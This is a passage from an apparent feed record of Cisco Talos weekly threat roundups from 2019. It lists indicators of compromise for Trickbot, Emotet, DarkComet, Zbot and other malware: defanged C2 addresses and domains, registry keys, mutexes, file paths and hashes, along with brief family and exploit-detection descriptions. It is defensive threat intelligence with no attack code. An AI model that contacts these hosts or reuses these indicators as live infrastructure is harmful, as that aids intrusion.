116 \n`178[.]33[.]160[.]0` | 116 \n`178[.]33[.]160[.]128` | 116 \n`178[.]33[.]160[.]192` | 116 \n`178[.]33[.]160[.]248` | 116 \n`178[.]33[.]160[.]252` | 116 \n`178[.]33[.]161[.]0` | 116 \n`178[.]33[.]161[.]128` | 116 \n`178[.]33[.]161[.]192` | 116 \n`178[.]33[.]161[.]224` | 116 \n`178[.]33[.]161[.]240` | 116 \n`178[.]33[.]161[.]248` | 116 \n`178[.]33[.]161[.]252` | 116 \n`178[.]33[.]162[.]0` | 116 \n`178[.]33[.]162[.]128` | 116 \n`178[.]33[.]162[.]224` | 116 \n`178[.]33[.]162[.]240` | 116 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 116 \n`bitaps[.]com` | 79 \n`chain[.]so` | 79 \n`BTC[.]BLOCKR[.]IO` | 79 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 37 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 16 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 116 \n`%TEMP%\\d19ab989\\4710.tmp` | 116 \n`%TEMP%\\d19ab989\\a35f.tmp` | 116 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 116 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 116 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 116 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 116 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 16 \n \n#### File Hashes\n\n` 0829786ae40c18d826631865dbd36bc72a5bf83855657316fa7b08221ff0f5cc 0e53d248a1e595deacef928a940792265e8f9e6e19aeedd6f15e9d3e77151ca3 0f1c4d1e75c4299391acc42ee6aeb7c37f662f49ddded5cda67b65e77c994590 116624dbb1103e20eb32786253daa919157862965ecee4a681ea6618b745297a 142a504ded2285194cc6d8a0d22ed667bb7e6755482b5a3781d21cff28a49f0c 166a7b7eb006ea685202b6fb866405290a8d881b1f17d8a713a8fba6019edf3a 1a21029006cd625a8eadf49354e1717d43d657eb185e905992a0b973813fe860 1ab97328ebfdaef12899218b558c1f0ec30495262794d0f6b4f4546aaa5e7e85 1d6782e87dbc95c0639bc44cd05bb172be993af6ba6cd5365f22f3e350a9f504 1ef0774c485c4921846551f9b2238804925ddb85fe9383202f94d313f8775528 220748f24923783182a2120dcd5a24799e799d13678ad58a117b064fe9f32d49 2424a1e17d890329fcb2926c40584a7f335cdcb6870f05eff82e2282fae8a3b4 24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782 25e96af9b71863c16e25f18ef627347aab568f190fc71956fa63553f2b2f65a2 274fbe5faac90ea5ffef8e7b4b9da60642f040194c28dce7de4f9c30b92a7b07 2df15738f5c6d25d23d54d5d74d8ade3eea927152c3cad6307de580397d8b56f 301e0d38d0bac986fe185ab4e420a623bbbbf9103d767950a3dd678111354a8b 37b913abb385ae596b98a0366e4b33fac6e5dc6423bff07375e210774dd6d1ca 382b8aac516f52bcba3ca0dadae42e550e54bd18fee696d732aa59687c388992 38d4098a18344443ad15805810ba895ceefaf05be83f8ac2f53ea2f69ae7745d 3a523bb773df8f955d0ca81ee411b044692d8c24793cdaba348c2505fddcba09 3cc7d8e616d84ec21af5a3c60348f101a53c0a09257d0fdb4d7d15a4268e6330 3ff2ab9bdbfcc01eb114bf8cfa9ebb6b222b0572eddefb7b09b31e78a99bcdec 412f050b6b171f08875aa4ee5e54a0ec5b263cef01e27debc47324342f6ae188 42bff53fe89ff3b4bc908bfb53fbcb6dda006fed7d6cfb9ab04ce84dbd62f9c2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JJKPEj09VZk/XYTywSpjQQI/AAAAAAAACrM/monRQwjg-j82-dg4GKOhbT8_d1QJ3rGAACLcBGAsYHQ/s1600/24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-V4TFbOwpb10/XYTy3IDdlCI/AAAAAAAACrQ/c2v2jBu4zhUdt9lXqqTDNhRiDWWSfFnggCLcBGAsYHQ/s1600/a56bcb5d4a60013575d6f99645819a9507bda433e4a1d4c4c520f8ddfe260018_tg.png>)\n\n \n\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-DHAaBGP7fS8/XYTy8L_fshI/AAAAAAAACrU/4l9tQuJGgiYfp57e9pFiDTR-_NbAECElQCLcBGAsYHQ/s1600/24578d9dfad55c280b363ee5a37f71a1aa2f5cd1388dcc67097caf03ec973782_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (11771) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (2431) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (2353) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nMadshi injection detected \\- (1796) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1465) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nTrickbot malware detected \\- (688) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nGamarue malware detected \\- (170) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (95) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (46) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nFusion adware detected \\- (44) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "cvss3": {}, "published": "2019-09-20T12:16:06", "type": "talosblog", "title": "Threat Roundup for September 13 to September 20", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-09-20T12:16:06", "id": "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3J4kmzlC65c/threat-roundup-0913-0920.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T19:01:48", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 25 and Nov. 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5dbc4d7341857.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Trickbot-7367071-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Dropper.Emotet-7365661-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \nWin.Trojan.DarkComet-7365618-1 | Trojan | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.Zbot-7364099-0 | Packed | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nWin.Malware.njRAT-7363922-1 | Malware | njRAT, also known as Bladabindi, is a RAT that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Trojan.Socks-7363151-0 | Trojan | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Lokibot-7363866-1 | Malware | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails. \nWin.Packed.Zeroaccess-7358361-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \nWin.Ransomware.Shade-7357624-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Trickbot-7367071-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 31 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]94[.]233[.]210` | 15 \n`192[.]3[.]104[.]46` | 11 \n`192[.]3[.]247[.]11` | 3 \n`172[.]82[.]152[.]126` | 2 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Download http service` | 31 \n`%ProgramData%\\\u00d0\u00bc\u00d1\u2021\u00d0\u00b2\u00d0\u00b0\u00d0\u017e\u00d0\u00bd\u00d0\u00b3\u00d1\u02c6\u00d0\u00ac\u00d0\u203a\u00d0\u2019\u00d1\u2021\u00d1\u008f\u00d0\u00b9.dfxcsd` | 31 \n`%APPDATA%\\NuiGet` | 31 \n`%APPDATA%\\NuiGet\\settings.ini` | 31 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 27 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 27 \n \n#### File Hashes\n\n` 12e8006a018c424bcb76b7c97d880314c08f79d8951a545d92d73034f5778ec7 194f14146ed498074cb229f3941740463913e79bc4a08a765f2ffd490dfbbdd0 35030bca598f6d38bf753df2c51fa0b43a0189f44438728efd0b17027cb7d6f6 4a66279719169895ee353164bebd0d14aea7bd6588fe0d4cea242465b260a519 4e42cd765cf0ab37b5a1141d446607a672473d409a7da92a34a3add36ce1a8c7 4ea19a355329cbf55d60502bc479daae8664a0df0148b52d0096d0ea9df67626 5c49e59a65499989081ae896fd9748ef572315a3c064e63e246a670d1d292fe0 5efb96495538937fe47d41b0d7e98db37de61e6f593d349238286df075c1397c 686831b801833681a66bf8d26369358725d6eeb3d6a59dfba359d0cffc0a6879 6b63955ef70f2db59d37e4a9d1d8ea6160348a07075a63f3aba90344a4359870 6c59d5e1cbc381e8fabd6886b9202ccb8cb47fde6d197ef656ca9038d720562b 6d64abd7986e0caefe99c4c11f23ee79dc583b5ae8667b44b224cbc2ed5587db 71d6c8a2a0201af5013f6624738ca844095d6f50d7a31f105e60726d54589918 75cc6fafd3becff2a1dcb7e7a4b37542fe5fcd4f399d36ae5d5659336900b4fb 7acd91a84c5bea43ad99688a67760fd0826bc7d67b0de373292f06ecbe2d9297 81cb4e71e4327b1969f30625661c6e027c8e33cfc04be4acd20cbe3a913c236b 823e680c8c8b03a264a6cd347b84ee72913622f0bc675b18a0b3dbe0cb11422a 8d6e5a67290d22e5bb7e2beed6d83c67bb40455c3a2e27e802997aaa7f98760a 9123558e3b1d5f8041754f2bf41ed0f453d3a02da5979454f9f574efc6dc82ef 9373dd5aeea4258abed94cae3f4cf771b59714f6b7f31efb16394108cf3a9e2d 98dd50a96301fae6c07eafed51df1d5d1bd444a7920a076cc2a72bb483ae9542 a5dbee433d7d11dfff76b54e00c1879f969787f9b760908add1f89946381165e b9b992d27c996693b7d315b58a51a562e9c9286728fa162d0204fad15cc68a28 bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa c98366526022af2d7c17edf78d0bc5856aabebdf712f314574c6c9bc65454cd5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0YU7XD9ums/XbxaV0GHyjI/AAAAAAAAC3c/cLthlQKYfA8Pk0XsFPKoEZOlgFEuWOmSwCLcBGAsYHQ/s1600/bd49f6d5e49f5dd45a38128ef576a86f1c447842d7a428ae08c7e33e321ed7aa_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7365661-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Type ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Start ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ErrorControl ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ImagePath ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: DisplayName ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: WOW64 ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: ObjectName ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS \nValue Name: Description ` | 168 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CHINESESONGS ` | 168 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 168 \n`Global\\M98B68E3C` | 168 \n`Global\\<random guid>` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]99[.]105[.]223` | 77 \n`54[.]38[.]94[.]197` | 59 \n`176[.]31[.]200[.]130` | 54 \n`74[.]202[.]142[.]71` | 52 \n`173[.]194[.]68[.]108/31` | 48 \n`190[.]182[.]161[.]7` | 48 \n`186[.]159[.]246[.]121` | 43 \n`190[.]229[.]205[.]11` | 41 \n`79[.]143[.]182[.]254` | 41 \n`62[.]149[.]157[.]55` | 35 \n`178[.]128[.]148[.]110` | 34 \n`212[.]129[.]24[.]79` | 34 \n`62[.]149[.]128[.]179` | 33 \n`176[.]9[.]47[.]53` | 31 \n`74[.]202[.]142[.]33` | 31 \n`62[.]149[.]152[.]151` | 31 \n`62[.]149[.]128[.]200/30` | 29 \n`17[.]36[.]205[.]74` | 27 \n`62[.]149[.]128[.]72/30` | 26 \n`191[.]252[.]112[.]194/31` | 25 \n`185[.]94[.]252[.]27` | 24 \n`45[.]55[.]82[.]2` | 24 \n`37[.]187[.]5[.]82` | 24 \n`200[.]206[.]34[.]68` | 24 \n`172[.]217[.]10[.]243` | 23 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]prodigy[.]net[.]mx` | 51 \n`mail[.]aruba[.]it` | 35 \n`smtp[.]infinitummail[.]com` | 33 \n`pop3s[.]aruba[.]it` | 33 \n`imail[.]dahnaylogix[.]com` | 31 \n`smtp[.]alestraune[.]net[.]mx` | 31 \n`mail[.]pec[.]aruba[.]it` | 31 \n`smtp[.]pec[.]aruba[.]it` | 31 \n`mail[.]outlook[.]com` | 27 \n`smtpout[.]secureserver[.]net` | 27 \n`pop3s[.]pec[.]aruba[.]it` | 26 \n`mail[.]cemcol[.]hn` | 19 \n`smtp[.]secureserver[.]net` | 18 \n`smtp[.]orange[.]fr` | 17 \n`ssl0[.]ovh[.]net` | 17 \n`as1r1066[.]servwingu[.]mx` | 15 \n`imaps[.]aruba[.]it` | 15 \n`outlook[.]office365[.]com` | 14 \n`mail[.]tiscali[.]it` | 14 \n`mail[.]singnet[.]com[.]sg` | 13 \n`mail[.]libero[.]it` | 13 \n`mbox[.]cert[.]legalmail[.]it` | 13 \n`mail[.]funfruit[.]com[.]mx` | 13 \n`mail[.]caoa[.]com[.]br` | 13 \n`smtp[.]outlook[.]com` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\xcsdwrsdk.dtxsd` | 91 \n`%ProgramData%\\dxcsdyjgbn.dfxcsd` | 77 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 56 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 56 \n`%SystemRoot%\\SysWOW64\\chinesesongsa.exe` | 6 \n`%SystemRoot%\\SysWOW64\\chinesesongsb.exe` | 3 \n`%ProgramData%\\Len350p.exe` | 1 \n`%ProgramData%\\uUgG1WJQ4usO.exe` | 1 \n`\\TEMP\\PpoNLODk9uCChTGo9HH.exe` | 1 \n`%SystemRoot%\\TEMP\\543E.tmp` | 1 \n`\\TEMP\\h5xs_232.exe` | 1 \n`\\TEMP\\R53Pew.exe` | 1 \n`\\TEMP\\o86t6prpvay0ah3.exe` | 1 \n`\\TEMP\\hw8ah6hmp5ku.exe` | 1 \n`\\TEMP\\scsl_2153.exe` | 1 \n`\\TEMP\\1p3gf.exe` | 1 \n`\\TEMP\\xk3wdb8t.exe` | 1 \n`\\TEMP\\067vnss8y_680.exe` | 1 \n`\\TEMP\\ypb8jo5.exe` | 1 \n`\\TEMP\\41v2241jicyu8m8.exe` | 1 \n`\\TEMP\\8aklv68ynf.exe` | 1 \n`%SystemRoot%\\TEMP\\2086.tmp` | 1 \n`%SystemRoot%\\TEMP\\2096.tmp` | 1 \n`\\TEMP\\wealxtx4234pz0.exe` | 1 \n`\\TEMP\\RlwZ7vqPWQOoRg.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0299861a3cdc50a555b8d327b8cdbe9ebb3d286bd67d34fd78e82910ba0a69da 02e0225c00b4f47728a493dbad00964ff4e2f975312d2fdccb5fee836b8e02a7 04242859c480e5af73f938324355a7058c209a29bd90cdc9c03095da158aafb6 04edae27709686fe0eec70970a0bb0073e1e573ed64341705545068b789eda9b 068c2726caca44b77e7ee220fb4d181d086dbf433c76b588297477ac5689d572 0704a26d82961ffcc14aa5f1ca3df6be3cd09cd4a27580ecff7eea8f6b70f7e2 078d578cfbb4ea91813381500b1d4b56106bb4c73b30697b6f9cc6bc46727251 0b1bb755d31acfd314aa59b362818f89afee12840cffa7665b9a21c909249e73 0c15940c4c9a49103c2e0b33cb1488a8838aa905dddc2a53e841e5be07a1cfe3 0df437e357d886397345b7bcebd48a4404c6c923758ea30bd286fbf786531771 100ed9e984af228f4c63f6e389066f244a146a07a24a98b2ef5737484f8b9418 10cb59a28331f74a3eb14a688be158aa83ad848a29b42e9b5e69f210470004af 10dd8ab62c73328905f71435a19e2fbd4c0b3c0bfb9c62e499ce321cd455e03d 11b968a43e6f27e16c73887a56b9e04315caa0ea36ccce003411ebeb83bfb28c 11cec37f15cb1f81608912172d843502b3e74c3cf5a6002b1d186b08c561556f 12e8a80c47ac89a43c220db77cd56b746284d8fb08b0544d0b5642ff01d42c31 186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69 19dec17408be3e2a980e50f038d4563911a0a3b315085db29b1cce06415902ce 1a24c713e52fc6072e7586ecd2ab3e858b03c893e463aae8c678c05c3b493be7 1ada1f15d5e4b2a7b67a8ee63ddb8ffbd15c2a2299977f3ff0f26f557e3d1ed8 1c80dd78b374786cd12cb3c466a69faef4b336b31b88259f735ae90a590151d6 217b0f8c66870cd11d7e6d22125e4afbb2ae711154a5ea7f56c40a02e7d6edfa 229b1494c66f15a919697f70307f34e082b77e53b4ec35b0425e5a1cac4665a2 23699f526439964cce4a8e8c9c5f27a4549bd7bb0293cae683e84730e20887ca 24d0044976a4122a3fcfedad6f66849eb0d1d9fa7fb7f7ad52bf0a9d97f394b5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-o2TmvVaFldY/XbxcOZ7C8jI/AAAAAAAAC3o/wBR9xuN1kEgLxbuiY9qtUwgF8jcSIOSKgCLcBGAsYHQ/s1600/186d8fc5e47032b99b15b3e64d5df4427d2d89dd8a0fc08e720800f5715f1f69_amp.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DYIS3fPk8sU/XbxcUlEAj-I/AAAAAAAAC3s/6HXf9kmfiXknSOCXVA3SxeaYjBj-CKDFQCLcBGAsYHQ/s1600/9b2a21c2d7563157b968e798f7a289c4010230532569a61638c6dabe9585b7db_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.DarkComet-7365618-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: java ` | 25 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-6ZFK11A` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`mrsnickers03[.]no-ip[.]biz` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 25 \n`%APPDATA%\\IDM` | 25 \n`%APPDATA%\\IDM\\ichader.exe` | 25 \n`%TEMP%\\WTHTE.bat` | 2 \n`%TEMP%\\WTHTE.txt` | 2 \n`%TEMP%\\SXIJG.txt` | 1 \n`%TEMP%\\PTQEQ.bat` | 1 \n`%TEMP%\\PTQEQ.txt` | 1 \n`%TEMP%\\USQVI.bat` | 1 \n`%TEMP%\\USQVI.txt` | 1 \n`%TEMP%\\CQGTP.bat` | 1 \n`%TEMP%\\CQGTP.txt` | 1 \n`%TEMP%\\NKKWS.bat` | 1 \n`%TEMP%\\NKKWS.txt` | 1 \n`%TEMP%\\WAXFT.bat` | 1 \n`%TEMP%\\WAXFT.txt` | 1 \n`%TEMP%\\JRFQG.bat` | 1 \n`%TEMP%\\JRFQG.txt` | 1 \n`%TEMP%\\APQNW.bat` | 1 \n`%TEMP%\\APQNW.txt` | 1 \n`%TEMP%\\UVJWH.bat` | 1 \n`%TEMP%\\UVJWH.txt` | 1 \n`%TEMP%\\OSNVJ.bat` | 1 \n`%TEMP%\\OSNVJ.txt` | 1 \n`%TEMP%\\MUISJ.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0d35dc067583af9f8ec8aa97a0ffafc8a92c52145196755eff63f62fd545da80 4671622ecb23629041c6f808461e60b20692ba4920d7207442db3e0bb2f9cb43 560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1 5b6a3069e1fdad0d43dea5e289a41ea3a76c2583990f070368394154339dc682 60fda48fabb1047741a46cb1989b1ed5a49fa8214955e328d9b9e0825bd06dae 76f99c94e4cb98ecb947dc0add432659cf9510cf0ff75dd532af16f68ca70612 7c15a840a3f2bd987e096d3810991e4f88fe65c9ba6efff2529c1608dfd39e34 7e18585cff88ab47bbdc0d2f9c76ade0d12cf1431983864c260ada790aee3afa 82648de7b9a19b4e1a23933f5c5a24991365fdd97bdb03d0cd95431f38df0b23 842e707c9400e589df5e4be6ec72454403fee00adb174c54b2f2dea3ac1d69d5 85faf6824e603e5bff1ec4e743bd944f2cfdca0098920cbf66467e4d24d8d919 87411b5aee6a4ca4f671b44e63cc9a8e0fc27ed2b43a843cfbe904c428420668 897e054816e7d69c51c73b843c0def266858d0f0eb50425930f975416210868c 8d8821ca5999ec65308100e8a4d7e3bdfe850783161c925789149394f1e071a5 91da6fab3b8e86ba31a0c36eb37787c5bd3723d2f452b59ec5ecac8431a721a3 937d56fae295a0647c6bcea2db66a1f33aefe91db3ab8bb04979ad745d5cd18d 94ac600212f0cb12d2dfb7f2e5a5814160226fa0cd2d545dd2ab32f3057fc92d 9a5b643414e9a3b2b0768123f6c2039c06ec39a1f647201cf284c1785809be2d 9db56c0d7979b0ec84776064129b1a2354d9d3b13f09cff625b106a230fc0caa a4d07da8c28394c58f19e8a7ffb8505386ef714efd4fe9f9d096462233cb7e87 a72e5af5e928da722ded5dee33dba92c9ff07b4c5a7cfdd083c60bc4c6ca6dd3 a7f813ece9b9f797ff84d1d13294892e499ba36e442a118f7f08a3499671e449 a9fc7d3f2b74b0640102d091bd79e5f98887e4bb43ad8bf153cd2e477b67dba6 b13881418dc9d5f70d4ed4da6188806132e6b9d4c7cfa45a6dd426203db5f797 b28117f5e719f5e2c419a9fd0569d40729442d1cff822b1644379986e29c9c50 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-HAKmpx9O84I/XbxdbHZJo2I/AAAAAAAAC38/_4iZQCmKcwo6GEB0WaEzsC9zgjt4SkYCgCLcBGAsYHQ/s1600/560532abb05b4b9219c6206d02defb4ce74f0f07be27173257df016e2576e0c1_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zbot-7364099-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\\\DSP \nValue Name: ChangeNotice ` | 1 \nMutexes | Occurrences \n---|--- \n`-e2a38afdMutex` | 25 \n`FvLQ49Il\u00eeIyLjj6m` | 25 \n`FvLQ49Il IyLjj6m` | 21 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]79[.]197[.]200` | 25 \n`212[.]83[.]168[.]196` | 21 \n`199[.]2[.]137[.]29` | 21 \n`62[.]112[.]10[.]15` | 21 \n`13[.]107[.]21[.]200` | 13 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]wipmania[.]com` | 21 \n`n[.]alnisat[.]com` | 21 \n`n[.]jagalot[.]com` | 21 \n`n[.]myadvsit1[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Exoiom.exe` | 21 \n \n#### File Hashes\n\n` 0cb65d9d8421292e933acf4b5f8aebbe69fcdad0948f8bf711ebf8be9ca23392 0d2b2655e40f10215b306fd47028cf2dffada53d808fec0784514f5a896746d9 